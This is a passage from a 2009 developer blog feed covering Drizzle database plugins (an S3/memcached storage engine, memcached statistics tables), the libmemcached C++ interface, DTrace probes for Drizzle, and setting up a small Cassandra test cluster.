	&lt;li&gt; create I_S tables for monitoring S3 usage&lt;/li&gt;
&lt;/ul&gt;
&lt;ul&gt;
	&lt;li&gt; add support for range queries&lt;/li&gt;
&lt;/ul&gt;
&lt;ul&gt;
	&lt;li&gt; remove the need for a table to have a primary key&lt;/li&gt;
&lt;/ul&gt;
If you are interested in downloading the branch and playing with it, you can get it and build it by:

&lt;pre&gt;
$ bzr branch lp:~posulliv/drizzle/aws-mc-engine
$ cd aws-mc-engine
$ ./config/autorun.sh &amp;&amp; ./configure &amp;&amp; make
&lt;/pre&gt;

libmemcached and libaws are prequisites that you will need installed before compiling this plugin.

If anyone has any feedback or suggestions on what to do with this, that would be awesome. I really have no idea what to do with it!
</content>
 <feedburner:origLink>http://posulliv.github.com//2009/11/09/s3-storage-engine-with-memcached-in-drizzle.html</feedburner:origLink></entry>
 
 <entry>
   <title>Viewing Memcached Statistics from Drizzle</title>
   <link href="http://feedproxy.google.com/~r/posulliv/~3/HvXx_-KZJ1c/viewing-memcached-statistics-from-drizzle.html" />
   <updated>2009-09-29T00:00:00-07:00</updated>
   <id>http://schacon.github.com//2009/09/29/viewing-memcached-statistics-from-drizzle</id>
   <content type="html">While working on a few memcached related plugins for Drizzle, I noticed that it would be nice to have the ability to query memcached statistics from an INFORMATION_SCHEMA table. Today I put together a plugin that adds 2 memcached related I_S tables to drizzle.

First, lets see the tables the plugin adds to drizzle along with the columns in each table:
&lt;pre&gt;
drizzle&amp;gt; select table_name
    -&amp;gt; from information_schema.tables
    -&amp;gt; where table_name like '%MEMCACHED%';
+--------------------+
| table_name         |
+--------------------+
| MEMCACHED_STATS    | 
| MEMCACHED_ANALYSIS | 
+--------------------+
2 rows in set (0 sec)

drizzle&amp;gt; desc information_schema.memcached_stats;
+-----------------------+-------------+------+-----+---------+-------+
| Field                 | Type        | Null | Key | Default | Extra |
+-----------------------+-------------+------+-----+---------+-------+
| NAME                  | varchar(32) | NO   |     |         |       | 
| PORT_NUMBER           | bigint      | NO   |     | 0       |       | 
| PROCESS_ID            | bigint      | NO   |     | 0       |       | 
| UPTIME                | bigint      | NO   |     | 0       |       | 
| TIME                  | bigint      | NO   |     | 0       |       | 
| VERSION               | varchar(8)  | NO   |     |         |       | 
| POINTER_SIZE          | bigint      | NO   |     | 0       |       | 
| RUSAGE_USER           | bigint      | NO   |     | 0       |       | 
| RUSAGE_SYSTEM         | bigint      | NO   |     | 0       |       | 
| CURRENT_ITEMS         | bigint      | NO   |     | 0       |       | 
| TOTAL_ITEMS           | bigint      | NO   |     | 0       |       | 
| BYTES                 | bigint      | NO   |     | 0       |       | 
| CURRENT_CONNECTIONS   | bigint      | NO   |     | 0       |       | 
| TOTAL_CONNECTIONS     | bigint      | NO   |     | 0       |       | 
| CONNECTION_STRUCTURES | bigint      | NO   |     | 0       |       | 
| GETS                  | bigint      | NO   |     | 0       |       | 
| SETS                  | bigint      | NO   |     | 0       |       | 
| HITS                  | bigint      | NO   |     | 0       |       | 
| MISSES                | bigint      | NO   |     | 0       |       | 
| EVICTIONS             | bigint      | NO   |     | 0       |       | 
| BYTES_READ            | bigint      | NO   |     | 0       |       | 
| BYTES_WRITTEN         | bigint      | NO   |     | 0       |       | 
| LIMIT_MAXBYTES        | bigint      | NO   |     | 0       |       | 
| THREADS               | bigint      | NO   |     | 0       |       | 
+-----------------------+-------------+------+-----+---------+-------+
24 rows in set (0 sec)

drizzle&amp;gt; desc information_schema.memcached_analysis;
+--------------------------------+-------------+------+-----+---------+-------+
| Field                          | Type        | Null | Key | Default | Extra |
+--------------------------------+-------------+------+-----+---------+-------+
| SERVERS_ANALYZED               | bigint      | NO   |     | 0       |       | 
| AVERAGE_ITEM_SIZE              | bigint      | NO   |     | 0       |       | 
| NODE_WITH_MOST_MEM_CONSUMPTION | varchar(32) | NO   |     |         |       | 
| USED_BYTES                     | bigint      | NO   |     | 0       |       | 
| NODE_WITH_LEAST_FREE_SPACE     | varchar(32) | NO   |     |         |       | 
| FREE_BYTES                     | bigint      | NO   |     | 0       |       | 
| NODE_WITH_LONGEST_UPTIME       | varchar(32) | NO   |     |         |       | 
| LONGEST_UPTIME                 | bigint      | NO   |     | 0       |       | 
| POOL_WIDE_HIT_RATIO            | bigint      | NO   |     | 0       |       | 
+--------------------------------+-------------+------+-----+---------+-------+
9 rows in set (0.01 sec)

drizzle&amp;gt; 
&lt;/pre&gt;

You might wonder how you specify the memcached servers to obtain statistics on. Well, I created a system variable for that purpose:
&lt;pre&gt;
drizzle&amp;gt; show variables like '%memcached%';
+-------------------------+-------+
| Variable_name           | Value |
+-------------------------+-------+
| memcached_stats_servers |       | 
+-------------------------+-------+
1 row in set (0 sec)

drizzle&amp;gt;
&lt;/pre&gt;

Now, lets set the system variable to a small memcached instance I have running on my laptop:
&lt;pre&gt;
drizzle&amp;gt; set global memcached_stats_servers = 'localhost:11211';
Query OK, 0 rows affected (0 sec)

drizzle&amp;gt; show variables like '%memcached%';
+-------------------------+-----------------+
| Variable_name           | Value           |
+-------------------------+-----------------+
| memcached_stats_servers | localhost:11211 | 
+-------------------------+-----------------+
1 row in set (0 sec)

drizzle&amp;gt;
&lt;/pre&gt;

And lets do a simple query on the MEMCACHED_STATS table:

&lt;pre&gt;
drizzle&amp;gt; select name, port_number, version, gets, sets, hits, misses
    -&amp;gt; from information_schema.memcached_stats;
+----------------------------------+-------------+----------+------+------+------+--------+
| name                             | port_number | version  | gets | sets | hits | misses |
+----------------------------------+-------------+----------+------+------+------+--------+
| localhost                        |       11211 | 1.2.6    |  975 |  407 |  950 |     25 | 
+----------------------------------+-------------+----------+------+------+------+--------+
1 row in set (0 sec)

drizzle&amp;gt;
&lt;/pre&gt;

The MEMCACHED_ANALYSIS table is not interesting unless there is more than 1 memcached server specified in the system variable. Thus, we need to update that system variable first:
&lt;pre&gt;
drizzle&amp;gt; set global memcached_stats_servers = 'localhost:11211, localhost:11212';
Query OK, 0 rows affected (0 sec)

drizzle&amp;gt;
&lt;/pre&gt;

Now, lets do the same query on MEMCACHED_STATS again:
&lt;pre&gt;
drizzle&amp;gt; select name, port_number, version, gets, sets, hits, misses from information_schema.memcached_stats;
+----------------------------------+-------------+----------+------+------+------+--------+
| name                             | port_number | version  | gets | sets | hits | misses |
+----------------------------------+-------------+----------+------+------+------+--------+
| localhost                        |       11211 | 1.2.6    |  975 |  407 |  950 |     25 | 
| localhost                        |       11212 | 1.2.6    |    0 |    0 |    0 |      0 | 
+----------------------------------+-------------+----------+------+------+------+--------+
2 rows in set (0 sec)

drizzle&amp;gt;
&lt;/pre&gt;

So you can see that for each server you specify in the system variable, a row will be output in the table. I'm going to make some activity happen in the second memcached instance I just started on my machine. Another branch I created over the last few days is a port of&lt;a href="http://krow.livejournal.com/"&gt; Brian&lt;/a&gt;'s &lt;a href="http://tangent.org/506/memcache_engine.html"&gt;memcached engine&lt;/a&gt; to drizzle. So I'm going to create a table using the memcached engine and then insert some data into that table:

&lt;pre&gt;
drizzle&amp;gt; create table test_data (
    -&amp;gt; a int primary key,
    -&amp;gt; b int,
    -&amp;gt; c varchar(64))
    -&amp;gt; engine=memcached;
Query OK, 0 rows affected (0.01 sec)

drizzle&amp;gt; insert into test_data
    -&amp;gt; values (1, 2, "this will be stored in memcached");
Query OK, 1 row affected (0.01 sec)

drizzle&amp;gt; select b, c 
    -&amp;gt; from test_data
    -&amp;gt; where a = 1;
+------+----------------------------------+
| b    | c                                |
+------+----------------------------------+
|    2 | this will be stored in memcached | 
+------+----------------------------------+
1 row in set (0 sec)

drizzle&amp;gt; select b, c  from test_data where a = 2;
Empty set (0 sec)

drizzle&amp;gt;
&lt;/pre&gt;

Now, lets query the statistics again:

&lt;pre&gt;
drizzle&amp;gt; select name, port_number, version, gets, sets, hits, misses from information_schema.memcached_stats;
+----------------------------------+-------------+----------+------+------+------+--------+
| name                             | port_number | version  | gets | sets | hits | misses |
+----------------------------------+-------------+----------+------+------+------+--------+
| localhost                        |       11211 | 1.2.6    |  975 |  407 |  950 |     25 | 
| localhost                        |       11212 | 1.2.6    |    2 |    1 |    1 |      1 | 
+----------------------------------+-------------+----------+------+------+------+--------+
2 rows in set (0.01 sec)

drizzle&amp;gt;
&lt;/pre&gt;

And we can see they have been updated as expected. Now, lets look at the MEMCACHED_ANALYSIS table. I'm just going to query the first 2 columns of this table:
&lt;pre&gt;
drizzle&amp;gt; select servers_analyzed, average_item_size
    -&amp;gt; from information_schema.memcached_analysis;
+------------------+-------------------+
| servers_analyzed | average_item_size |
+------------------+-------------------+
|                2 |                86 | 
+------------------+-------------------+
1 row in set (0 sec)

drizzle&amp;gt;
&lt;/pre&gt;

There will always just be one row in the output from this table. It essentially mimics the functionality of the memstat client utility in libmemcached.

I'm not too sure what what to do with this patch at the moment. If people are interested, I can propose it for merging into Drizzle so that it will be available as a plugin. 
</content>
 <feedburner:origLink>http://posulliv.github.com//2009/09/29/viewing-memcached-statistics-from-drizzle.html</feedburner:origLink></entry>
 
 <entry>
   <title>Using Memcached with C++</title>
   <link href="http://feedproxy.google.com/~r/posulliv/~3/idxg2DtmOfQ/using-memcached-with-c.html" />
   <updated>2009-09-19T00:00:00-07:00</updated>
   <id>http://schacon.github.com//2009/09/19/using-memcached-with-c</id>
   <content type="html">For some plugins I am working on for &lt;a href="http://www.drizzle.org/"&gt;Drizzle&lt;/a&gt;, I am using the &lt;a href="https://launchpad.net/libmemcached"&gt;libmemcached API&lt;/a&gt;. However, the C++ interface for libmemcached was quite simple and not really C++ so we have updated it a little bit in the last few months since drizzle is written in C++ and it would be nice to use a more C++-like interface in libmemcached. In this post, I'll show some simple sample usage of the libmemcached C++ interface based on &lt;a href="http://sacharya.com/using-memcached-with-java/"&gt;this article&lt;/a&gt; about using memcached with Java. Please note that not all this functionality is in the latest stable version of libmemcached but it will likely be in the next release.

&lt;h3&gt;Installation&lt;/h3&gt;
I am going to assume that memcached is already installed (see &lt;a href="http://blog.ajohnstone.com/archives/installing-memcached/"&gt;here&lt;/a&gt; for a good guide to installing it). To obtain libmemcached, we can either obtain the latest version of the source from launchpad, download an RPM, or download a tarball of the latest stable release and build that. I'm going to go with downloading a tarball since not everyone might have bzr installed. The latest stable release can be obtained from &lt;a href="http://tangent.org/552/libmemcached.html"&gt;here&lt;/a&gt;.

&lt;pre&gt;
$ cd libmemcached-0.32
$ ./configure
$ make
$ sudo make install
$ sudo ldconfig
&lt;/pre&gt;

&lt;h3&gt;Basic Usage&lt;/h3&gt;
The API is very similar to the C API except more suited to C++. Some simple examples of constructing a memcached client are shown:&lt;br&gt;

&lt;script src="http://gist.github.com/189562.js"&gt;&lt;/script&gt;
&lt;br&gt;

There are many more methods available than the 3 listed above but for most simple applications, those 3 should get you pretty far. We still need to add documentation for the C++ interface which should also be included in the next stable release of libmemcached.

&lt;h3&gt;MyCache Singleton&lt;/h3&gt;
As done in the Java article, I create a wrapper around the memcached client as so:&lt;br&gt;

&lt;script src="http://gist.github.com/189520.js"&gt;&lt;/script&gt;
&lt;br&gt;

The DeletePtrs class is simply a generic function object that deletes the pointers in an STL container. I use this to delete all the Memcache objects in the vector before it is destroyed to ensure I don't have a memory leak (have a look at item 7 in Meyer's Effective STL for more information).

&lt;h3&gt;Sample Usage&lt;/h3&gt;
Below, we show some samples of using the MyCache singleton. We assume that Product is some class that has been developed elsewhere that we want to cache.&lt;br&gt;

&lt;script src="http://gist.github.com/189545.js"&gt;&lt;/script&gt;
&lt;br&gt;

That's about it really. As you can see, the C++ interface has been improved in libmemcached. There is still some more work needed on the C++ interface but I think its starting to look a lot better.
</content>
 <feedburner:origLink>http://posulliv.github.com//2009/09/19/using-memcached-with-c.html</feedburner:origLink></entry>
 
 <entry>
   <title>Using DTrace with Drizzle</title>
   <link href="http://feedproxy.google.com/~r/posulliv/~3/OXTs5bovEPo/using-dtrace-with-drizzle.html" />
   <updated>2009-09-14T00:00:00-07:00</updated>
   <id>http://schacon.github.com//2009/09/14/using-dtrace-with-drizzle</id>
   <content type="html">&lt;p&gt;Over the weekend, I was reading about the DTrace support in MySQL and realized that the DTrace support in drizzle needed to be updated. Thus, I created a branch and went to work on porting the latest probes from MySQL 6.0 to drizzle. I proposed a branch for merging into trunk which contains most of the relevant static probes along with some small build fixes to ensure that the probes are correctly enabled. Hopefully, this branch will get merged in the next week or two. In this post, I'm going to give some really simple examples of using the static probes in drizzle along with pointers to various places where lots more information can be obtained on using dtrace (mostly with MySQL but it all applies to drizzle too really).&lt;/p&gt;

&lt;h2&gt;Building Drizzle with DTrace Support&lt;/h2&gt;

&lt;p&gt;First of all, the drizzle binary built on a platform with dtrace is not configured with dtrace support by default. Thus, we need to configure drizzle by passing it the --enable-dtrace option. The rest of the build and installation process is the same as normal. Note that I have not tested dtrace support on OSX and I believe it probably does not work correctly at the moment. This is something I'll aim to fix (with help from Monty) in the next few weeks.&lt;/p&gt;
&lt;p&gt;To verify that the probes were built correctly, you should get similar output when listing the probes available in dtrace:&lt;/p&gt;

&lt;pre&gt;
$ pfexec dtrace -l | grep drizzle | c++filt 
62444 drizzle11722          drizzled bool dispatch_command(enum_server_command,Session*,char*,unsigned) command-done
62445 drizzle11722          drizzled bool dispatch_command(enum_server_command,Session*,char*,unsigned) command-start
62446 drizzle11722          drizzled void Session::awake(Session::killed_state) connection-done
62447 drizzle11722          drizzled                 end_thread_signal connection-done
62448 drizzle11722          drizzled       void close_connections() connection-done
62449 drizzle11722          drizzled        bool Session::schedule() connection-start
62450 drizzle11722          drizzled bool mysql_delete(Session*,TableList*,Item*,st_sql_list*,unsigned long,unsigned long,bool) delete-done
62451 drizzle11722          drizzled bool drizzled::statement::Delete::execute() delete-start
62452 drizzle11722          drizzled unsigned long filesort(Session*,Table*,st_sort_field*,unsigned,SQL_SELECT*,unsigned long,bool,unsigned long*) filesort-done
62453 drizzle11722          drizzled unsigned long filesort(Session*,Table*,st_sort_field*,unsigned,SQL_SELECT*,unsigned long,bool,unsigned long*) filesort-start
62454 drizzle11722          drizzled bool mysql_insert(Session*,TableList*,List&amp;,List&lt;List &gt;&amp;,List&amp;,List&amp;,enum_duplicates,bool) insert-done
62455 drizzle11722          drizzled     void select_insert::abort() insert-select-done
62456 drizzle11722          drizzled  bool select_insert::send_eof() insert-select-done
62457 drizzle11722          drizzled bool drizzled::statement::InsertSelect::execute() insert-select-start
62458 drizzle11722          drizzled bool drizzled::statement::Insert::execute() insert-start
62459 drizzle11722          drizzled bool dispatch_command(enum_server_command,Session*,char*,unsigned) query-done
62460 drizzle11722          drizzled void mysql_parse(Session*,const char*,unsigned,const char**) query-exec-done
62461 drizzle11722          drizzled void mysql_parse(Session*,const char*,unsigned,const char**) query-exec-start
62462 drizzle11722          drizzled bool parse_sql(Session*,Lex_input_stream*) query-parse-done
62463 drizzle11722          drizzled bool parse_sql(Session*,Lex_input_stream*) query-parse-start
62465 drizzle11722          drizzled bool dispatch_command(enum_server_command,Session*,char*,unsigned) query-start
62466 drizzle11722          drizzled bool handle_select(Session*,LEX*,select_result*,unsigned long) select-done
62467 drizzle11722          drizzled bool handle_select(Session*,LEX*,select_result*,unsigned long) select-start
62468 drizzle11722          drizzled int mysql_update(Session*,TableList*,List&amp;,List&amp;,Item*,unsigned,order_st*,unsigned long,enum_duplicates,bool) update-done
62469 drizzle11722          drizzled int mysql_update(Session*,TableList*,List&amp;,List&amp;,Item*,unsigned,order_st*,unsigned long,enum_duplicates,bool) update-start
$
&lt;/pre&gt;

&lt;h2&gt;Example Usage&lt;/h2&gt;
&lt;p&gt;I'm just going to show some sample scripts that I obtained from various other sources (these sources are listed later) related to DTrace with MySQL. The first simple script we will try measures query execution time (this does not include time for parsing):&lt;/p&gt;

&lt;pre&gt;
#!/usr/sbin/dtrace -s

#pragma ident   "%Z%%M% %I%     %E% SMI"

#pragma D option quiet
#pragma D option switchrate=10

dtrace:::BEGIN
{
        printf(" %-16s %5s %3s %s\n", "DATABASE", "ms",
            "RET", "QUERY");
}

drizzle*:::query-exec-start
{
        self-&gt;start = timestamp;
        this-&gt;query = copyinstr(arg0);
        this-&gt;db = arg2 ? copyinstr(arg2) : ".";
}

drizzle*:::query-exec-done
/self-&gt;start/
{
        this-&gt;elapsed = (timestamp - self-&gt;start) / 1000000;
        printf(" %-16.16s %5d %3d %-32.32s\n",
            this-&gt;db, this-&gt;elapsed, (int)arg0, this-&gt;query);
        self-&gt;start = 0;
}
&lt;/pre&gt;

&lt;p&gt;The output from running that script on a toy instance of drizzle (unfortunately, I'm still a student so don't get to administer or play with any real databases) where I was running small queries is:&lt;/p&gt;

&lt;pre&gt;
$ pfexec dtrace -qp `pgrep drizzled` -s ./qestat.d
 DATABASE            ms RET QUERY
                      0   0 select @@version_comment limit 1
                      0   0 show databases
                      0   0 SELECT DATABASE()
 test                 0   0 show databases
 test                 0   0 show tables
 test                 0   0 show tables
 test                 0   0 select * from t1
 test                 5   0 create table t1(a int)
 test                 0   0 insert into t1 values (5), (6),
 test                 0   0 select * from t1
 test                 0   0 select a from t1 where a = 7
^C
$
&lt;/pre&gt;

&lt;p&gt;Next, lets write a simple script that uses the filesort probe:&lt;/p&gt;

&lt;pre&gt;
#!/usr/sbin/dtrace -s

#pragma ident   "%Z%%M% %I%     %E% SMI"

#pragma D option quiet
#pragma D option switchrate=10

drizzle$target:::query-start
{
  self-&gt;query = copyinstr (arg0);
  self-&gt;query_start = timestamp ;
}

drizzle$target:::filesort-start
{
  self-&gt;filesort_start = timestamp;
}

drizzle$target:::filesort-done
{
  self-&gt;filesort = timestamp - self-&gt;filesort_start;
}

drizzle$target:::query-done
/ self-&gt;query != 0 /
{
  printf("%s\n", self-&gt;query);
  printf("Total: %dus Filesort: %dus\n",
            (timestamp - self-&gt;query_start) / 1000,
            self-&gt;filesort / 1000);
  self-&gt;query = 0;
}
&lt;/pre&gt;

&lt;p&gt;The output from running that is (again, I have no data to play with here):&lt;/p&gt;

&lt;pre&gt;
$ pfexec dtrace -qp `pgrep drizzled` -s ./filesort.d
select @@version_comment limit 1
Total: 148us Filesort: 0us
show databases
Total: 595us Filesort: 0us
SELECT DATABASE()
Total: 114us Filesort: 0us
show databases
Total: 348us Filesort: 0us
show tables
Total: 274us Filesort: 0us
show fields in 't1'
Total: 112us Filesort: 0us
show tables
Total: 402us Filesort: 0us
select * from t1
Total: 292us Filesort: 0us
select * from t1 order by a
Total: 384us Filesort: 116us
^C
$
&lt;/pre&gt;

&lt;p&gt;There is lots more that can be done. Have a look at the resources below for many more examples that can be tried out on drizzle. I'm just beginning to play with DTrace in my spare time really so I'm not aware of all its capabilities and use cases. It would be cool to see something similar to the &lt;a href="http://opensolaris.org/os/community/dtrace/dtracetoolkit/"&gt;DTrace Toolkit&lt;/a&gt; for drizzle though (like the Drizzle DTrace Toolkit...DDT).&lt;/p&gt;

&lt;h2&gt;More Information&lt;/h2&gt;
&lt;p&gt;A lot of articles and presentations have been produced on using DTrace with MySQL. Since the current probes in drizzle are just copied from MySQL, those are articles and presentations are still pretty useful to read if you want to play around with the dtrace probes in drizzle. Here are some good ones that I have come across:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="http://assets.en.oreilly.com/1/event/21/DTrace%20Support%20in%20MySQL_%20Guide%20to%20Solving%20Real-life%20Performance%20Problems%20Presentation.pdf"&gt;DTrace Support in MySQL: Guide to Solving Real-life Performance Problems &lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://assets.en.oreilly.com/1/event/21/Deep-inspecting%20MySQL%20with%20DTrace%20Presentation.pdf"&gt;Deep-inspecting MySQL with DTrace&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://forge.mysql.com/w/images/e/ec/MySQLUDTrace0901.pdf"&gt;Using DTrace with MySQL&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://dev.mysql.com/tech-resources/articles/getting_started_dtrace_saha.html"&gt;Getting Started with DTracing MySQL&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.solarisinternals.com/wiki/index.php/DTrace_Topics_Databases"&gt;DTrace Database Topics&lt;/a&gt; (from the Solaris Internals wiki)&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;Future Work&lt;/h2&gt;
&lt;p&gt;This is really just the beginning of adding dtrace support to drizzle. The largest issues right now are build related and ensuring that everything works correctly on both Solaris and OSX. The static probes that I defined were all copied from MySQL with some tiny modifications in places. I'd like to know what kind of probes other people would like to see? Does anyone have any suggestions or ideas? I'd really like to hear from people who actually administer databases on what they would like to see.&lt;/p&gt;

&lt;p&gt;From a drizzle developer's perspective, one thing I hope to see in the future is the ability for plugins to add static probes if they wish. I also need to add the probes in the handler. The only reason those are not present at the moment is due to some build related issues that I hope to resolve in the next few weeks.&lt;/p&gt;
</content>
 <feedburner:origLink>http://posulliv.github.com//2009/09/14/using-dtrace-with-drizzle.html</feedburner:origLink></entry>
 
 <entry>
   <title>Building a Small Cassandra Cluster for Testing and Development</title>
   <link href="http://feedproxy.google.com/~r/posulliv/~3/sCCJwHg6sDs/building-a-small-cassandra-cluster-for-testing-and-development.html" />
   <updated>2009-09-07T00:00:00-07:00</updated>
   <id>http://schacon.github.com//2009/09/07/building-a-small-cassandra-cluster-for-testing-and-development</id>
   <content type="html">For college, I was playing with &lt;a href="http://incubator.apache.org/cassandra/"&gt;cassandra&lt;/a&gt; and thought I would document my experience in setting up a small cassandra cluster for playing around with. For this article, I actually used virtual machines (3 of them). I am assuming that we have a fresh ubuntu installation on each node. I'm also assuming static IP addresses so the /etc/hosts file on each node will have the following entries (the actual IP addresses and host names can be whatever you like):

&lt;pre&gt;
192.168.221.138 cass01                  cass01
192.168.221.139 cass02                  cass02
192.168.221.140 cass03                  cass03
&lt;/pre&gt;

The process that I follow is to perform all the actions I outline below on one node and before actually starting the cassandra service, I clone the virtual machine as many times as I want. This makes it extremely quick for me to get up and running. I'm not going to go into detail on these issues here as there is plenty of information on these topics elsewhere (which go in to a lot more detail).

&lt;h2&gt;Required Packages&lt;/h2&gt;
Cassandra requires very little to run:
&lt;ul&gt;
	&lt;li&gt;Java 1.6&lt;/li&gt;
	&lt;li&gt;Ant&lt;/li&gt;
	&lt;li&gt;svn or git (only if you wish to obtain the latest code from trunk)&lt;/li&gt;
&lt;/ul&gt;
These packages can be installed easily:

&lt;pre&gt;
$ sudo apt-get install sun-java6-jdk ant git-core
&lt;/pre&gt;

&lt;h2&gt;Create "cassandra" User and Directories&lt;/h2&gt;
The following tasks will be performed on all nodes that we want to be in the cluster (what I do is to perform these actions on just 1 virtual machine and then clone the virtual machine multiple times). We are going to create a user account and group that cassandra will run as.

&lt;pre&gt;
$ sudo groupadd -g 501 cassandra
$ sudo useradd -m -u 501 -g cassandra -d /home/cassandra -s /bin/bash \
&gt; -c "Cassandra Software Owner" cassandra
$ id cassandra
uid=1001(cassandra) gid=501(cassandra) groups=501(cassandra)
$ sudo passwd cassandra
&lt;/pre&gt;

Next, we create directories for storing the software, data, commit logs, and configuration files.

&lt;pre&gt;
$ sudo mkdir -p /opt/cassandra
$ sudo mkdir -p /opt/cassandra/source
$ sudo mkdir -p /opt/cassandra/logs
$ sudo mkdir -p /opt/cassandra/callouts
$ sudo mkdir -p /opt/cassandra/bootstrap
$ sudo mkdir -p /opt/cassandra/staging
$ sudo mkdir -p /opt/cassandra/conf
$ sudo mkdir -p /u01/cassandra/data
$ sudo mkdir -p /u02/cassandra/commitlog
$ sudo chown -R cassandra:cassandra /opt/cassandra
$ sudo chown -R cassandra:cassandra /u01/cassandra
$ sudo chown -R cassandra:cassandra /u02/cassandra
$ sudo chmod -R 755 /var/cassandra
$ sudo chmod -R 755 /u01/cassandra
$ sudo chmod -R 755 /u02/cassandra
&lt;/pre&gt;

Above, we are making an assumption that /u01 and /u02 would be separate disks. Of course, I do not have separate disks but in reality, that the ideal scenario would be to store the commit logs and data on separate disks as alluded to above.  In order to make administration easier, we add the following the cassandra user's .bashrc file (or .bash_profile):

&lt;pre&gt;
export JAVA_HOME=/usr/lib/jvm/java-6-sun

export CASSANDRA_HOME=/opt/cassandra/source/latest
export CASSANDRA_INCLUDE=/opt/cassandra/conf/cassandra.in.sh
export CASSANDRA_CONF=/opt/cassandra/conf
export CASSANDRA_PATH=$CASSANDRA_HOME/bin

export PATH=$CASSANDRA_PATH:$PATH
&lt;/pre&gt;

Obviously, the various environment variables should be set to whatever is appropriate for your environment if you are deviating from what I am setting up here.

&lt;h2&gt;Download Cassandra&lt;/h2&gt;
download cassandra (we will use git in this article)  There are a number of options for downloading cassandra:
&lt;ul&gt;
	&lt;li&gt;&lt;a href="http://incubator.apache.org/cassandra/#download"&gt;Stable Releases&lt;/a&gt;&lt;/li&gt;
	&lt;li&gt;&lt;a href="http://hudson.zones.apache.org/hudson/job/Cassandra/lastSuccessfulBuild/artifact/cassandra/build/"&gt;Nightly Development Snapshots&lt;/a&gt;&lt;/li&gt;
	&lt;li&gt;Latest Code from trunk&lt;/li&gt;
&lt;/ul&gt;
Running the latest code in trunk is not recommended as it is not a stable release. However, I'm going to use the latest version of the repository (cloned from the git read-only repository) for this article as I'm interested in following the development of cassandra. Thus, I'll use git to retrieve the latest code:

&lt;pre&gt;
$ su - cassandra
$ cd /opt/cassandra/source
$ git clone git://git.apache.org/cassandra.git latest
&lt;/pre&gt;

&lt;h2&gt;Build and Configure Cassandra&lt;/h2&gt;
Now, we need to build the software:

&lt;pre&gt;
$ su - cassandra
$ cd $CASSANDRA_HOME
$ ant
Buildfile: build.xml

build-subprojects:

init:
    [mkdir] Created dir: /opt/cassandra/source/latest/build/classes
    [mkdir] Created dir: /opt/cassandra/source/latest/build/test/classes
    [mkdir] Created dir: /opt/cassandra/source/latest/src/gen-java

check-gen-cli-grammar:

gen-cli-grammar:
     [echo] Building Grammar /opt/cassandra/source/latest/src/java/org/apache/cassandra/cli/Cli.g  ....

build-project:
     [echo] apache-cassandra-incubating: /opt/cassandra/source/latest/build.xml
    [javac] Compiling 254 source files to /opt/cassandra/source/latest/build/classes
    [javac] Note: Some input files use or override a deprecated API.
    [javac] Note: Recompile with -Xlint:deprecation for details.
    [javac] Note: Some input files use unchecked or unsafe operations.
    [javac] Note: Recompile with -Xlint:unchecked for details.

build:

BUILD SUCCESSFUL
Total time: 10 seconds
$
&lt;/pre&gt;

We would like to be able to keep configuration files out of the main source tree so we copy the sample configuration files provided with the source to a particular configuration directory we maintain for cassandra:

&lt;pre&gt;
$ cp -R $CASSANDRA_HOME/conf/* $CASSANDRA_CONF
$ cp $CASSANDRA_HOME/bin/cassandra.in.sh $CASSANDRA_INCLUDE
$ cd $CASSANDRA_CONF
$ ls -l
total 24
-rw-r--r-- 1 cassandra cassandra  1886 2009-09-05 16:05 cassandra.in.sh
-rw-r--r-- 1 cassandra cassandra  1664 2009-09-05 14:51 log4j.properties
-rw-r--r-- 1 cassandra cassandra 13926 2009-09-05 14:51 storage-conf.xml
$
&lt;/pre&gt;

The cassandra.in.sh file can be used to specify JVM options (such as the maximum heap size). Within the cassandra.in.sh file we copied over, various options can be set but we need to remove the following lines (as we have already defined CASSANDRA_CONF):

&lt;pre&gt;
# The directory where Cassandra's configs live (required)
CASSANDRA_CONF=$cassandra_home/conf
&lt;/pre&gt;

The first configuration file which we modify is the storage-conf.xml file. The main portions which we modify are:&lt;br&gt;

&lt;script src="http://gist.github.com/288454.js"&gt;&lt;/script&gt;
&lt;br&gt;

The storage-conf.xml configuration file is well commented and provides ample explanation on the various parameters that can be configured. It is worth reading through that file when you are wondering what can be tweaked in cassandra.  Next, we need to configure the logging properties for the system. These properties are specified in the log4j.properties file (again in the $CASSANDRA_CONF directory). The portion to modify is:

&lt;pre&gt;
# Edit the next line to point to your logs directory
log4j.appender.R.File=/opt/cassandra/logs/system.log
&lt;/pre&gt;

&lt;h2&gt;Starting/Stopping Cassandra&lt;/h2&gt;
First, lets start cassandra on one node in the foreground to ensure that everything is set up correctly. Open 2 terminal windows and in one of them, start cassandra in the foreground:

&lt;pre&gt;
$ su - cassandra
$ cassandra -f
Listening for transport dt_socket at address: 8888
DEBUG - Loading settings from /opt/cassandra/conf/storage-conf.xml
DEBUG - Syncing log with a period of 1000
DEBUG - opening keyspace Keyspace1
DEBUG - adding Super1 as 0
DEBUG - adding Standard2 as 1
DEBUG - adding Standard1 as 2
DEBUG - adding StandardByUUID1 as 3
DEBUG - adding LocationInfo as 4
DEBUG - adding HintsColumnFamily as 5
DEBUG - opening keyspace system
INFO - Saved Token not found. Using 66210133872783152550171468874444798372
DEBUG - Starting to listen on 127.0.1.1:7001
DEBUG - Binding thrift service to cass01:9160
INFO - Cassandra starting up...
&lt;/pre&gt;

Now, in the other terminal window, use the cassandra command-line interface to connect to the instace we started in our other window:

&lt;pre&gt;
$ su - cassandra
$ cassandra-cli --host cass01 --port 9160
Connected to cass01/9160
Welcome to cassandra CLI.

Type 'help' or '?' for help. Type 'quit' or 'exit' to quit.
cassandra&gt; help
List of all CLI commands:
?                                                      Same as help.
connect \&lt;hostname&gt;/&lt;port&gt;                              Connect to Cassandra's thrift service.
describe keyspace &lt;keyspacename&gt;                       Describe keyspace.
exit                                                   Exit CLI.
help                                                   Display this help.
quit                                                   Exit CLI.
show config file                                       Display contents of config file
show cluster name                                      Display cluster name.
show keyspaces                                         Show list of keyspaces.
show version                                           Show server version.
get &lt;tbl&gt;.&lt;cf&gt;['&lt;rowKey&gt;']                             Get a slice of columns.
get &lt;tbl&gt;.&lt;cf&gt;['&lt;rowKey&gt;']['&lt;colKey&gt;']                 Get a column value.
set &lt;tbl&gt;.&lt;cf&gt;['&lt;rowKey&gt;']['&lt;colKey&gt;'] = '&lt;value&gt;'     Set a column.
cassandra&gt; show version
0.4.0
